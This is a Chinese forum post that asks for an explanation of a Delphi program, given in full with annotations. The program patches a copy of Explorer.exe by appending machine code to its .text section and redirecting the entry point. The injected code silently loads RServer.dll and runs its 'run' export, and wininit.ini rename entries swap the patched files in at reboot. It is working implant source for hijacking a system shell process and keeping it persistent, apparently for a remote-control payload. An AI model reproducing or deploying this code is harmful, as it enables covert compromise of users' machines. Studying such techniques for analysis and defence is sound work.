源码讨论!!!!高手抢分!!菜鸟也可来学习学习!!!
谁能为我详细地说明以下代码,100分就给谁!注意,这100分只给最好的一个人!!
本程序在 Explorer.exe 的 .text 节末尾追加一小段代码并把入口点改到这段代码：Explorer 启动时它会先加载 RServer.dll 并调用其导出的 run，再跳回原入口点；对正在使用的文件的替换则靠 wininit.ini 的 [rename] 在重启时完成。这实际上是一种 PE 入口点劫持/自启动植入手法，仅供分析学习，请勿在生产系统上运行。
program AddShell;
uses
windows,messages,sysutils,classes;
const CRLF=#13#10;
//;Layout of the data area at the start of the injected stub (offsets relative
//;to the pushed data-area address held in ebx).  These are fixed: the
//;hand-assembled code in asm32 addresses them as [ebx+offset], so changing
//;one means re-encoding those instructions.
FunctionName =0;
DllName =FunctionName+9;
WndClassName =DllName+13; //;asm32 actually writes "Progman" here (the original note said "RServer")
CodeBegin =WndClassName+$12; //;first byte of code after the data area ($28)
//
//;One IMAGE_IMPORT_DESCRIPTOR as it lies in the file.  FindWin32Api treats
//;FunctionAddress as the RVA of the name/hint thunk table (OriginalFirstThunk)
//;and FunctionRaw as the RVA of the parallel IAT slots (FirstThunk) whose
//;absolute address is baked into the emitted "call dword ptr [..]".
type TImportTable=record
FunctionAddress,TimeDateStamp,ForwardLink,DllName,FunctionRaw:dword;
end;
//;The 16 bytes of a section header after its 8-byte Name:
//;VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData.
type TObjectSectionInfo=record
VirtualSize,VirtualAddress,RawDataSize,RawDataAddress:dword;
end;
//;AddressOfEntryPoint, BaseOfCode, BaseOfData, ImageBase - read as one
//;$10-byte block at PE header +$28 by GetPeInformation.
type TBaseInfo=record
EntryPoint,BaseCode,BaseData,ImageBase:dword;
end;
//;Everything the patcher learns about the target.  Base = file offset of the
//;PE header; TextObjectBase = file offset of the .text header's VirtualSize
//;field (rewritten by asm32); BaseImport = import directory RVA.
//;DataObjectBase, Attrib, Odata and OReloc are never assigned in this file.
type TPeInfo=record
Base,TextObjectBase,DataObjectBase,Attrib:dword;
Bs:TBaseInfo;
BaseImport:dword;
Otext,Odata,OImport,OReloc:TObjectSectionInfo;
end;
var
windir:array[0..100] of char; //;Windows directory, filled by GetWindowsDirectory
codebuf:array[0..$200] of byte; //;the stub being assembled: data area + code
PeFileHandle:integer; //;handle of windir\Explorer.new, opened read/write
// ts:tstrings;
Pe:TPeInfo;
cp:dword; //;write cursor into codebuf, shared by DwordtoByte/FindWin32Api/asm32
NewEntryPoint,NewJump:dword; //;RVA of the stub and the rel32 back to the old entry point
procedure DwordtoByte(vard,vapd:dword);
// Store vard little-endian into codebuf[cp+vapd .. cp+vapd+3].
// The offset is relative to the global write cursor cp, which this
// procedure does not advance; every caller bumps cp itself.
// NOTE(review): there is no bounds check against High(codebuf), so a
// cursor past $1FD silently overwrites whatever follows codebuf.
var
  i:integer;
begin
  for i:=0 to 3 do
    codebuf[cp+vapd+i]:=byte(vard shr (8*i));
end;
procedure StrToByte(str:string;vapd:dword);
// Copy the bytes of str (without a terminator) into codebuf starting at the
// absolute offset vapd.  Unlike DwordtoByte this is not cp-relative.
// The C strings the stub hands to LoadLibraryA/GetProcAddress/FindWindowA
// are only NUL-terminated because asm32 zero-fills codebuf first and leaves
// a gap after each string; nothing here guarantees that.
var
  i:integer;
begin
  for i:=1 to length(str) do
    codebuf[vapd+i-1]:=byte(str[i]);
end;
function GetPeInformation:boolean;
// Parse just enough of the PE file open on PeFileHandle to locate the entry
// point, the code section and the import directory, filling the global Pe.
// Returns False (after a message box) when the DOS/PE signatures do not
// match.  Side effect: also writes windir\wininit.ini with a [rename]
// section that swaps Explorer.new and RServer.new over the live files at
// the next boot (see the end of the function).
// All offsets below are raw file offsets.  The code assumes a 32-bit PE with
// a $E0-byte optional header (section table at PE+$F8) and never checks the
// FileRead return values.
var
varw:word;
vard,vald:dword;
ts:tstrings;
// Ip:TImportTable;
begin
result:=true;
ts:=tstringlist.create;
// ts collects diagnostics that are freed without ever being shown or saved -
// a debugging leftover.  NOTE(review): the two early exits below return
// without freeing ts (leak).
FileSeek(PeFileHandle,$18,0); // DOS header e_lfarlc; $40 marks a new-style executable
FileRead(PeFileHandle,varw,2);
if(varw<>$40) then
begin
messagebox(0,'Not a PE File!!!',pchar(format('Info:%x',[varw])),0);
result:=false;
exit;
end;
ts.add(format('$18=$%x[PE File]',[varw]));
FileSeek(PeFileHandle,$3c,0); // e_lfanew: file offset of the PE header
FileRead(PeFileHandle,vard,4);
Pe.Base:=vard;
ts.add(format('$3C=$%x[PE Begin]',[vard]));
FileSeek(PeFileHandle,vard,0); // 'PE\0\0' signature read as a little-endian dword
FileRead(PeFileHandle,vald,4);
if(vald<>$4550) then
begin
messagebox(0,'Not a PE File!!!',pchar(format('Info:%x',[vald])),0);
result:=false;
exit;
end;
ts.add(format('$%x=$%x[PE Signal]',[vard,vald]));
// AddressOfEntryPoint, BaseOfCode, BaseOfData, ImageBase: $10 bytes at
// optional header +$10 (= PE header +$28)
vard:=Pe.Base+$28;
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Bs,$10);
ts.add(format('$%x=$%x[EntryPoint]',[vard,Pe.Bs.EntryPoint]));
ts.add(format('$%x=$%x[BaseCode]',[vard,Pe.Bs.BaseCode]));
// Import directory RVA (DataDirectory[1].VirtualAddress, PE header +$80)
vard:=Pe.Base+$80;
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,vald,4);
Pe.BaseImport:=vald;
ts.add(format('$%x=$%x[BaseImport]',[vard,vald]));
//
// Find the code section: walk the section headers ($28 bytes each) until one
// has VirtualAddress = BaseOfCode.  Starting at PE+$100 skips the 8-byte Name
// of the first header, so each $10-byte read yields VirtualSize,
// VirtualAddress, SizeOfRawData, PointerToRawData.
// NOTE(review): the walk is not bounded by NumberOfSections; if nothing
// matches it reads past the table (and past EOF) forever.
vard:=Pe.Base+$100;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Otext,$10);
if(Pe.Otext.VirtualAddress=Pe.Bs.BaseCode) then break;
inc(vard,$28);
end;
Pe.TextObjectBase:=vard; // file offset of .text's VirtualSize field, rewritten by asm32
ts.add(format('$%x=$%x[.text.VirtualSize]',[vard,Pe.Otext.VirtualSize]));
// Find the section that contains the import directory RVA (same walk, same
// unbounded-loop caveat).
vard:=Pe.Base+$100;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Pe.Oimport,$10);
if(Pe.BaseImport>=Pe.Oimport.VirtualAddress) and (Pe.BaseImport<=Pe.Oimport.VirtualAddress+Pe.Oimport.VirtualSize) then break;
inc(vard,$28);
end;
ts.add(format('$%x=$%x[Pe.BaseImport]',[vard,Pe.BaseImport]));
ts.free;
//
// Deferred file replacement: a [rename] section in windir\wininit.ini is the
// Windows 9x boot-time mechanism for overwriting files that are in use.  This
// is what makes the patch persistent, and the file is the clearest on-disk
// indicator of the modification.  NOTE(review): NT-based systems use a
// different mechanism; nothing here establishes that the Windows 2000 claim
// in the program's final message box holds.
ts:=tstringlist.create;
ts.add('[rename]');
ts.add(strpas(windir)+'\Explorer.exe='+strpas(windir)+'\Explorer.new');
ts.add(strpas(windir)+'\RServer.dll='+strpas(windir)+'\RServer.new');
// ts.add(strpas(windir)+'\RControl.exe='+strpas(windir)+'\RControl.new');
ts.savetofile(strpas(windir)+'\'+'wininit.ini');
ts.free;
//
end;
//
function FindWin32Api(var CurrentPosition:dword;Win32ApiName:string):boolean;
// Look up Win32ApiName in the target's import tables and, if found, emit a
// 6-byte "call dword ptr [abs]" at codebuf[cp] whose operand is the absolute
// virtual address of that import's IAT slot (ImageBase + slot RVA); cp is
// advanced by 6.  Returns False and emits nothing when the name is absent.
// CurrentPosition is never used; the global cp is the real cursor.
// File offsets are derived as RVA - (VirtualAddress - PointerToRawData) of
// the section that holds the import directory, which only holds for RVAs
// inside that same section (descriptors, thunk tables and name strings).
var
varw:word;
vard,vald,vafd,vavd,vakd,ipdif:dword;
varpc:array[0..200] of char;
Ip:TImportTable;
begin
// Locate the Win32 API's import address
result:=false;
vard:=Pe.Oimport.RawDataAddress; // file offset of the import section (overwritten two lines down)
ipdif:=Pe.Oimport.VirtualAddress-Pe.Oimport.RawDataAddress; // RVA -> file offset delta for this section
vard:=Pe.BaseImport-ipdif;
while(true) do
begin
FileSeek(PeFileHandle,vard,0);
FileRead(PeFileHandle,Ip,$14);
// End of the descriptor list.  NOTE(review): only OriginalFirstThunk is
// tested; a descriptor whose OriginalFirstThunk is 0 but FirstThunk is not
// would end the walk early.
if(Ip.FunctionAddress=0) then break;
vald:=Ip.FunctionAddress-ipdif; // file offset of the name/hint thunk table
vakd:=Ip.FunctionRaw-ipdif; // file offset of the parallel IAT entries
while(true) do
begin
FileSeek(PeFileHandle,vald,0);
FileRead(PeFileHandle,vafd,$4);
if(vafd=0) then break; // end of this DLL's thunk table
// NOTE(review): vafd is used as an RVA unconditionally; an import-by-ordinal
// entry (high bit set) would send the seek to a bogus offset.
vavd:=vafd-ipdif;
FileSeek(PeFileHandle,vavd,0);
FileRead(PeFileHandle,varw,2); // hint (unused)
FileSeek(PeFileHandle,vavd+2,0);
FileRead(PeFileHandle,varpc,$20); // function name; varpc is uninitialised, so a name of 32+ chars has no terminator within the read
if strcomp(varpc,pchar(Win32ApiName))=0 then
begin
// Emit "call dword ptr [ImageBase + IAT-slot RVA]" (FF 15 imm32).
// The operand is an absolute address with no relocation entry, so the
// stub only works when the image loads at its preferred ImageBase.
vavd:=vakd+ipdif+Pe.bs.ImageBase;
codebuf[cp]:=$ff;
codebuf[cp+1]:=$15;
DwordtoByte(vavd,2);
inc(cp,6);
result:=true;
exit;
end;
inc(vald,$4);
inc(vakd,$4);
end;
inc(vard,$14);
end;
end;
procedure asm32;
// Assemble the loader stub into codebuf, then splice it into the PE open on
// PeFileHandle.  Stub layout, counting the bytes emitted below (offsets in
// codebuf; the whole stub is $82 bytes):
//   $00  call $28             ; pushes $05 = address of the data area
//   $05  "run", "RServer.dll", "Progman" at FunctionName/DllName/WndClassName
//   $28  pop ebx              ; ebx = data area, so the stub is position-independent
//   $29  call $57             ; pushes $2E = address of the thread routine
//   $2E  thread routine: h:=LoadLibraryA(ebx+DllName); if h<>0 then begin
//        p:=GetProcAddress(h,ebx+FunctionName); if p<>0 then call p;
//        FreeLibrary(h) end; ret
//   $57  pop edi              ; edi = $2E
//        if FindWindowA(ebx+WndClassName,0)=0 then
//          CreateThread(0,0,edi,ebx,0,@tid)   ; tid = 4 bytes reserved on the stack
//   $7D  jmp OldEntryPoint
// Runtime effect: when the patched Explorer starts and no "Progman" window
// exists yet, a thread loads RServer.dll and calls its "run" export; the
// original entry point then runs as usual.
// Assumptions baked in and not checked here:
//  - APIs are reached through absolute IAT addresses (see FindWin32Api), so
//    the image must load at its preferred base;
//  - the thread routine has no prologue and reads its parameter from
//    [ebp+0Ch], i.e. it relies on the frame the CreateThread start stub leaves
//    in ebp, not on a documented convention;
//  - .text has at least cp bytes of slack between VirtualSize and
//    SizeOfRawData.  Only AddressOfEntryPoint and .text VirtualSize are
//    rewritten; SizeOfImage, SizeOfRawData and the PE checksum are not.
// NOTE(review): the loc_xx labels in the comments below are the author's; by
// the byte count above the two jz's land on $56 (ret) and $4F (push edi) and
// the jnz on $7D (the final jmp).
var k:integer;
vard:dword;
begin
GetPeInformation; // NOTE(review): result ignored - on a non-PE file the patch below is still written
cp:=0;
for k:=0 to $200 do codebuf[k]:=0; // zero the buffer; also supplies the NUL terminators after each string
//
DwordtoByte($23e8,0); inc(cp,5); //call fn_5 - E8 rel32 to CodeBegin; the pushed return address ($05) is the data-area pointer
//
StrToByte('run',FunctionName+cp); // strings are placed at absolute offset 5+const, matching [ebx+const] with ebx=5
StrToByte('RServer.dll',DllName+cp);
StrToByte('Progman',WndClassName+cp);
inc(cp,CodeBegin-5); // skip over the data area to the first code byte
//
codebuf[cp]:=$5B; inc(cp,1); //pop ebx - ebx = data area
DwordtoByte($29e8,0); inc(cp,5); //call fn_5 - pushes the address of the thread routine that follows
//
// --- thread routine (entered via CreateThread) ---
DwordtoByte($c5d8b,0); inc(cp,3); //mov ebx,[ebp+0ch] - lpParameter (data area) via the start stub's frame
DwordtoByte($9438d,0); inc(cp,3); //lea eax,[ebx+DllName]
codebuf[cp]:=$50; inc(cp,1); //push eax
FindWin32Api(cp,'LoadLibraryA'); //call dword ptr [LoadLibraryA]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($1774,0); inc(cp,2); //jz loc_50 - load failed: straight to ret
//
DwordtoByte($f88b,0); inc(cp,2); //mov edi,eax - module handle
codebuf[cp]:=$53; inc(cp,1); //push ebx ;[ebx+FunctionName] = "run"
codebuf[cp]:=$57; inc(cp,1); //push edi
FindWin32Api(cp,'GetProcAddress'); //call dword ptr [GetProcAddress]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($274,0); inc(cp,2); //jz loc_46 - no "run" export: skip the call
//
DwordtoByte($d0ff,0); inc(cp,2); //call eax - run()
//
codebuf[cp]:=$57; inc(cp,1); //push edi
FindWin32Api(cp,'FreeLibrary'); //call dword ptr [FreeLibrary]
codebuf[cp]:=$c3; inc(cp,1); //ret - thread exits
// --- back in the entry-point path ---
//
codebuf[cp]:=$5f; inc(cp,1); //pop edi - edi = thread routine address pushed by the second call
DwordtoByte($6a,0); inc(cp,2); //push 0
DwordtoByte($16438d,0); inc(cp,3); //lea eax,[ebx+WndClassName]
codebuf[cp]:=$50; inc(cp,1); //push eax
FindWin32Api(cp,'FindWindowA'); //call dword ptr [FindWindowA]
DwordtoByte($c00b,0); inc(cp,2); //or eax,eax
DwordtoByte($1575,0); inc(cp,2); //jnz loc_7d - a "Progman" window already exists: do not start the thread
//
DwordtoByte($4ec83,0); inc(cp,3); //sub esp,4 - reserve the lpThreadId slot
codebuf[cp]:=$54; inc(cp,1); //push esp - lpThreadId
DwordtoByte($6a,0); inc(cp,2); //push 0 - dwCreationFlags
codebuf[cp]:=$53; inc(cp,1); //push ebx - lpParameter = data area
codebuf[cp]:=$57; inc(cp,1); //push edi - lpStartAddress = thread routine
DwordtoByte($6a,0); inc(cp,2); //push 0 - dwStackSize
DwordtoByte($6a,0); inc(cp,2); //push 0 - lpThreadAttributes
FindWin32Api(cp,'CreateThread'); //call dword ptr [CreateThread]
DwordtoByte($4c483,0); inc(cp,3); //add esp,4 - release the lpThreadId slot (stdcall cleaned the six args)
//
codebuf[cp]:=$e9; inc(cp,1); //jmp OldEntryPoint
NewEntryPoint:=Pe.OText.VirtualSize+Pe.Otext.VirtualAddress; // stub RVA: first byte past .text's current VirtualSize
NewJump:=Pe.Bs.EntryPoint-(NewEntryPoint+Cp+4); // rel32 measured from the end of the jmp (cp already past E9)
DwordtoByte(NewJump,0); inc(cp,4); //
// Patch the PE headers on disk
vard:=Pe.Base+$28; // AddressOfEntryPoint -> the stub
FileSeek(PeFileHandle,vard,0);
FileWrite(PeFileHandle,NewEntryPoint,4);
vard:=Pe.TextObjectBase; // .text VirtualSize grows by the stub size
FileSeek(PeFileHandle,vard,0);
vard:=Pe.Otext.VirtualSize+cp;
FileWrite(PeFileHandle,vard,4);
vard:=Pe.Otext.RawDataAddress+Pe.Otext.VirtualSize; // write the stub into the raw slack at the end of .text (slack not verified)
FileSeek(PeFileHandle,vard,0);
FileWrite(PeFileHandle,codebuf,cp);
end;
begin
// Program entry.  Artifact trail left on disk: windir\Explorer.old (pristine
// copy, made once), windir\Explorer.new (patched copy rebuilt from .old each
// run, so the stub is never applied twice), windir\RServer.new (RServer.dll
// copied from the current directory) and windir\wininit.ini (written inside
// GetPeInformation) which swaps the .new files over the live ones at the next
// boot.  None of the CopyFile results are checked.
if(GetWindowsDirectory(windir,100)<100) then
begin
if fileexists(strpas(windir)+'\Explorer.old')=false then copyfile(pchar(strpas(windir)+'\Explorer.exe'),pchar(strpas(windir)+'\Explorer.old'),false);
copyfile(pchar(strpas(windir)+'\Explorer.old'),pchar(strpas(windir)+'\Explorer.new'),false);
copyfile(pchar('RServer.dll'),pchar(strpas(windir)+'\RServer.new'),false);
// copyfile(pchar('RControl.exe'),pchar(strpas(windir)+'\RControl.exe'),false);
PeFileHandle:=FileOpen(strpas(windir)+'\Explorer.new', fmOpenReadWrite or fmShareDenyNone);
if(PeFileHandle<>-1) then asm32
else MessageBox(0,'PE File Not Found!!!','error',0);
FileClose(PeFileHandle); // NOTE(review): also reached with PeFileHandle = -1 after a failed FileOpen
// NOTE(review): shown unconditionally, even after the open failed; the OS
// list it claims is not verified anywhere in this program.
messagebox(0,'Pach for:'+CRLF+CRLF+'Windows 95 OSR2'+CRLF+'Windows 98 Second Edition'+CRLF+'Windows 2000 Professional'+CRLF+CRLF+'OK,Pach compelete!!!','hotsky.363.net',0);
end else messagebox(0,'error,can''t found Windows Directory,current pach isn''t compelete!!!','error',0);
end.